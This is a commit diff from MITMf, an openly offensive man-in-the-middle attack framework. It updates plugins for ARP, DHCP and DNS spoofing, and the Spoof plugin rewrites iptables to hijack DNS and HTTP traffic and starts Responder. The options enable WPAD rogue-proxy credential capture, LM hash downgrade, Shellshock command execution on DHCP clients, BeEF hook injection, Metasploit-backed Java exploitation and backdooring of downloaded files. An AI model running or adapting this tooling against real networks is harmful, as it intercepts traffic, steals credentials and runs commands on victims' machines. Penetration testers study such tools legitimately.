github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-21 05:53:30 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

almost done! lots of changes

Browse source
This commit is contained in:
byt3bl33d3r 2014-12-05 08:21:35 +01:00
commit 787f96d665
12 changed files with 202 additions and 201 deletions
Download patch file Download diff file Expand all files Collapse all files

3
plugins/AirPwn.py
View file

@ -32,7 +32,7 @@ class AirPwn(Plugin):
sys.exit("[-] AirPwn plugin requires --miface argument")
try:
self.aircfg = ConfigObj(self.aircfg)
self.aircfg = ConfigObj("./config/airpwn.cfg")
#Here we compile the regexes for faster performance when injecting packets
for rule in self.aircfg.items():
rule[1]['match'] = re.compile(r'%s' % rule[1]['match'])
@ -135,5 +135,4 @@ class AirPwn(Plugin):
def add_options(self, options):
options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')

11
plugins/AppCachePoison.py
View file

@ -1,21 +1,18 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
from libs.sslstrip.ResponseTampererFactory import ResponseTampererFactory
#import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg or "./config_files/app_cache_poison.cfg"
self.config_file = "./config/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")

8
plugins/BeefAutorun.py
View file

@ -38,7 +38,7 @@ class BeefAutorun(Inject, Plugin):
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
userconfig = ConfigObj("./config/beefautorun.cfg")
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
@ -117,10 +117,10 @@ class BeefAutorun(Inject, Plugin):
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--hookip', dest='hookip', help="Hook IP")
group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')

2
plugins/FilePwn.py
View file

@ -38,7 +38,7 @@ class FilePwn(Plugin):
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg or "./config_files/filepwn.cfg"
self.filepwncfg = options.filepwncfg or "./config/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']

3
plugins/JavaPwn.py
View file

@ -35,7 +35,7 @@ class JavaPwn(BrowserProfiler, Plugin):
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
self.javacfg = ConfigObj(self.javapwncfg)
self.javacfg = ConfigObj("./config/javapwn.cfg")
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
@ -182,7 +182,6 @@ class JavaPwn(BrowserProfiler, Plugin):
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')
def finish(self):
'''This will be called when shutting down'''

65
plugins/Spoof.py
View file

@ -13,6 +13,7 @@ import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
from libs.responder.Responder import *
import os
import sys
import threading
@ -39,11 +40,8 @@ class Spoof(Plugin):
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.wpad = options.wpad
self.dns = options.dns
self.dnscfg = options.dnscfg
self.dhcp = options.dhcp
self.dhcpcfg = options.dhcpcfg
self.shellshock = options.shellshock
self.cmd = options.cmd
self.gateway = options.gateway
@ -52,10 +50,11 @@ class Spoof(Plugin):
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
thread_target = None
thread_args = None
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
@ -63,13 +62,17 @@ class Spoof(Plugin):
if not self.interface:
sys.exit('[-] Spoof plugin requires --iface argument')
try:
self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % self.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
try:
self.mac = get_if_hwaddr(self.interface)
except Exception, e:
@ -107,23 +110,28 @@ class Spoof(Plugin):
self.rand_number = []
self.dhcp_dic = {}
self.dhcpcfg = ConfigObj(self.dhcpcfg)
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
thread_target = self.dhcp_sniff
thread_args = ()
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
elif not options.WPAD_On_Off:
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --wpad")
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.dnscfg = ConfigObj("./config/dns.cfg")
self.hstscfg = ConfigObj(self.hstscfg)
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
self.start_dns_queue()
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
@ -133,13 +141,18 @@ class Spoof(Plugin):
print '[*] Setting up iptables'
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
CHarvester = CredHarvester()
t1 = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
#CHarvester = CredHarvester()
threads = []
if thread_target:
threads.append(threading.Thread(name='spoof_thread', target=thread_target, args=thread_args))
#t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
for t in [t1, t2]:
t.setDaemon(True)
t.start()
threads.append(threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)))
if threads:
for t in threads:
t.setDaemon(True)
t.start()
def dhcp_rand_ip(self):
pool = self.dhcpcfg['ip_pool'].split('-')
@ -345,14 +358,22 @@ class Spoof(Plugin):
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#rgroup = options.add_argument_group("Responder", "Options for Responder")
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
options.add_argument('--verbose', dest="Verbose", action="store_true", help="More verbose")
def finish(self):
self.send = False